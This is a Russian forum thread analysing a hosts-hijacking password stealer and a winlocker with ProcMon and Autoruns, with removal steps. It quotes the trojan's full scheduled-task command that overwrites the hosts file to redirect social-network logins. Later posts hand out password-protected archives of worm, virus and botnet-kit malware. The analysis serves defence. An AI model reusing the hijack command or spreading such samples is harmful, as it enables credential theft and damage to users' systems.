• Обратная связь: [email protected]

    Наш канал в telegram: https://t.me/ru_sfera

    Группа VK: https://vk.com/rusfera

    Пользователи могут писать на форуме ТОЛЬКО ЧЕРЕЗ 7 ДНЕЙ после регистрации

Анализ вирусов посредством ProcMon и ProcExp


модемщик

Уважаемый пользователь
Форумчанин
Регистрация
10.05.2013
Сообщения
36
Репутация
140
Прошу уважаемых форумчан помочь с поиском:
Trojan.Mods.1 ака Trojan.Redirect.140
Trojan.ArchiveLock.20
Trojan.Hosts (любой из свежих)
Trojan.Winlock (любой из свежих)
Win32.HLLP.Neshta (или подобный червь)

В свою очередь обещаю выложить обзор с пошаговым разбором действий этих зверьков под микроскопом "ProcMon"а, плюс защита и лечение посредством средств Sysinternals и windows.
 

модемщик

Уважаемый пользователь
Форумчанин
Регистрация
10.05.2013
Сообщения
36
Репутация
140
Как и обещал - анализ вредоносной программы в архиве dREbbSq.rar,
Trojan.PWS.Stealer.1932 (По классификации Dr.web)
Исходные данные:
ОС Win7 ult x32
Версия ОС: 6.1.7601 Service Pack 1 сборка 7601
Установленные обновления:
Definition Update for Windows Defender - KB915597 (Definition 1.149.1652.0)Включен UAC на максимальный уровень, работа ведется от администратора.

Безымянный.png
Началось все с эпик фэйла, защитник виндовс зарубил софтину на корню, пришлось трояну помочь, разрешив его выполнение.
Далее произошло следующее
Безымянный4.png


Троян почитал настройки интернета, поковырялся в истории ИЕ, в кукисах, изменил настройки безопасности зон интранета, и полез на сервер 37.10.104.92:4915 никаких данных не передавал, скорее всего получил файл фейкового хоста.
Безымянный3.png

После этого создал в %temp% фейковый hosts, попытался создать тот же файл в папке Windows, на что ему не хватило доступа. В файле, на самом донышке обнаружились записи перенаправляющие страницы входа соцсетей mail, vk, odnoklassniki на сервер зловредов. Т.е. пользователь при попытке входа в соцсети подарит свои учетные данные, плюс для восстановления доступа к соцсетям ему предложат привязать анкету к телефону(ещё и с денежкой расстанется)
Но пока этот файл мирно покоится в папке %temp% и ничем нам не угрожает, Зловредный код все ещё не активирован.
Далее идет активация cmd.exe
"C:\Windows\System32\cmd.exe" /c copy C:\Windows\system32\drivers\etc\hosts C:\Windows\system32\drivers\etc\hosts.sam /Y && at 22:49:00 /every:M,T,W,Th,F,S,Su cmd.exe "/c attrib -H C:\Windows\system32\drivers\etc\hosts && copy C:\Users\Freelncr\AppData\Local\Temp\1857847aq C:\Windows\system32\drivers\etc\hosts /Y && attrib +H C:\Windows\system32\drivers\etc\hosts"
Эти данные позднее будут переданы в at.exe(приложения для создания назначенных заданий)
Безымянный1.png
Все таки нам приходится ещё раз помочь трояну, и мы повышаем привилегию процесса.
после успешного старта cmd.exe родительский процесс 622блабла.exe завершает свою работу и больше не запускается никогда.
Безымянный5.png



at.exe создает задание
Безымянный2.png



Данное задание периодически заменяет нормальный хост фейковым.

После создания задачи все процессы завершаются, и далее вся работа ложится на планировщик, который тупо будет заменять хост фейковым.

Лечение.
Для маскировки троян больше не проявляет себя, оставив только задание в планировщике, в котором никакого вредоносного кода нет, только стандартная операция копирования. С большой вероятностью даже при обнаружении антивирусом тела, и очистки hosts задание будет продолжать исправно работать.
Сооствественно лечение состоит в удалении тела, задания и файла hosts.
Просмотр Autoruns, ProcExp, ProcMon после перезагрузки никаких следов деятельности трояна не показал, излечение полное. Записей в автозагрузке троян не оставляет, никакие системные файлы не модифицирует.
Ну и напоследов разница между фейковым хостом и настоящим:

Безымянный7.png
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 199
Репутация
8 333
Классный обзор, спасибо !wink1
 

модемщик

Уважаемый пользователь
Форумчанин
Регистрация
10.05.2013
Сообщения
36
Репутация
140
Обзор винлокера из архива DMWD.rar
Trojan.Winlock.6049 (по классификации Dr.web)
Исходные данные:
ОС Win7 ult x32
Версия ОС: 6.1.7601 Service Pack 1 сборка 7601
Установленные обновления:
Definition Update for Windows Defender - KB915597 (Definition 1.149.1652.0)Включен UAC на максимальный уровень, работа ведется от администратора.

Пробный пуск выдал ожидаемый результат.
1.png
Запуск в безопасном режиме выдал то же самое
2.png
Следующей попыткой был запущен безопасный режим с поддержкой командной строки.
Отличительной чертой этого режима является то, что вместо стандартного shell запускается cmd.exe, что в нашем случае привело к штатному запуску.
3.png
Запустить оттуда autoruns было делом 10 секунд.
5.png


Как мы видим троянец обосновался HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell заменив собой explorer.exe
и в HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ банально добавив себя в автозагрузку пользователя.
Лечение в нашем случае - это удаление ключей из run и замене exeшника вируса в Shell на explorer.exe Можно удалить тело вируса, но это совсем необязательно.

Теперь разбор в ProcMon.
Т.к. троян надежно блокирует все попытки завершить свой процесс, а посмотреть шо там у него внутри procmonом очень хочется мы воспользуемся тем, что прописывает он себя HKCU, т.е. в реестр конкретного пользователя. Мы создадим второго тестового пользователя с админскими правами. Если бы троян прописывал бы себя HKLM, то особой проблемы бы это тоже не вызвало, мы бы просто сняли fullaccess права пользователей с нужной ветки, и троян бы не смог записать ничего(при условии, что UAC включен)
Теперь мы запускаем трояна и нажатием трех волшенбных кнопок меняем пользователя. Далее мы завершаем процесс и возвращаемся обратно
9.png

Далее анализируем то, что нам насобирал ProcMon
10.png

В итоге получается, что данный winlock - творение очень ленивых разработчиков. По факту каждую свою загрузку он прописывает себя в Shell и в Run.
Дальше вы видите, как через csrss он задает параметры окон для текущих объектов. Например ставит себе размер в полный экран, выдвигает себя на первый план.

Собственно проблема состоит в fullaccess правах пользователей на такие ветки реестра как HKCU..... Shell и Run.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 199
Репутация
8 333
По поводу винлоков, здесь на сайте есть исходники, старющие правда, ну думаю современные не далеко ушли, их тоже при желании можно проанализировать, вот этот шифрует данные на компе, а потом просит отправить СМС:http://ru-sfera.pw/threads/Исходник-программы-вымогателя.158/

А вот этот совсем простенький, но примечателен тем, что написан на Делфи, его исходник можно глянуть:http://ru-sfera.pw/threads/Простенький-trojan-winlock-на-делфи.109/
 

модемщик

Уважаемый пользователь
Форумчанин
Регистрация
10.05.2013
Сообщения
36
Репутация
140
По поводу винлоков, здесь на сайте есть исходники, старющие правда, ну думаю современные не далеко ушли, их тоже при желании можно проанализировать, вот этот шифрует данные на компе, а потом просит отправить СМС/

Вот спасибо, как раз то, что нужно.

Ещё бы только боевого свежего червя найти.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 199
Репутация
8 333
Удалось найти исходник, написан на делфи, не компилировал, т.к. делфи у меня не установлен, установлен только C++ Bulder 6, обычно в нём пишу, как-то после института, открывать Делфи не хочу, да и высокоуровневым программированием что-то уже давно не занимаюсь, пишу в основном в Кейле...

Вот если нужно исходник Win32.HLLP.Neshta, во вложении 99_worm.zip !

Вот и нашёл какой-то Вирус Penetrator не знаю червь это, или нет, вот его особенности:

1.Долбит файлы формата( avi, .doc, .jpg, .jpeg, .mp3, .mpeg, .mpg, .pdf, .ppt, .rar, .vob, .wma, .wmv, .xls, .zip)
2.Меняет файлы картинок и текстовых форматов на свой(penetrator, нах..уй послана сука....И т.п)
3.Блокирует антивирусы(если комп им заражён) и становится для них невидимым
4.Ему чихать на безопасный режим
5.Долбит всё по локальной сети.........
и т.п

Ps: Вирус действует не сразу,а лишь в определённые числа !

Во вложении:80_penetr.rar

Пароль:3256
 

Вложения

  • 99_worm.zip
    13.2 КБ · Просмотры: 19
  • 80_penetr.rar
    1.8 МБ · Просмотры: 17

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 199
Репутация
8 333
Вот удалось вытащить на одном хакерском сайте из под хайда 15 лайков червяка, в начале хотел по хорошему, набрал 15-ть, а потом оказалось, что это лайки, меня ещё и забанили за флуд, пришлось по плохому, зря время только потерял...sm3888

В общем, что делает этот червяк:

Zunker+Zupacha — контрольный центр управления ботнетом и бот-клиент.

Полный функционал Zupacha был довольно внушительным. Помимо загрузки других файлов в систему его основной задачей было дальнейшее самораспространение. Об одном из таких способов (встраивании своих текстов в сообщения на форумах) мы писали выше. Всего же Zupacha мог «спамить» свои ссылки тремя способами:

ICQ\Jabber-спам. Тексты со ссылкой на вредоносные сайты добавляются во все сообщения, которые пользователь отправляет из этих Instant Messengers.
Web-спам. Тексты добавляются в любые веб-формы, заполняемые пользователем. Как правило, это форумы, а также веб-интерфейсы почтовых систем.
Почтовый спам. Текст добавляется к тексту писем пользователя.

Необходимо отметить, что во всех этих случаях Zupacha самостоятельно не инициирует рассылку сообщений всеми описанными методами. Он только контролирует активность пользователя и добавляет свои тексты в любые исходящие сообщения, причем сам пользователь этого не видит.

Однако Zupacha не занимается кражей данных — это всего лишь самораспространяющийся троянец-загрузчик. Следовательно, он не мог выступить в роли пресловутого «универсального» кода.

Это червь хоть не самый новый, но что-то в паблике скрывается под хайдом аж 100 сообщений, либо лайков 10-15, а здесь можно его и так скачать для теста.

Основной файл вируса config/file.exe, а config/config.exe, его настройки, раньше продавался...
Как указывают в Panda, программа отличается продуманностью и простотой в использовании. Zunker делит сети по странам и выдает отчеты по каждому боту: сколько спама он разослал и какое ПО было использовано для отправки.

По словам специалистов Panda, в Zunker впервые для программ подобного рода в одном интерфейсе интегрированы функции управления и мониторинга. По данным Panda Software, программа используется для управления десятками тысяч ПК не менее чем в 54 странах.

Пароль:111
 

Вложения

  • zunkerb01t.rar
    971 КБ · Просмотры: 22
Автор темы Похожие темы Форум Ответы Дата
virt Обзоры новых вирусов 0
Верх Низ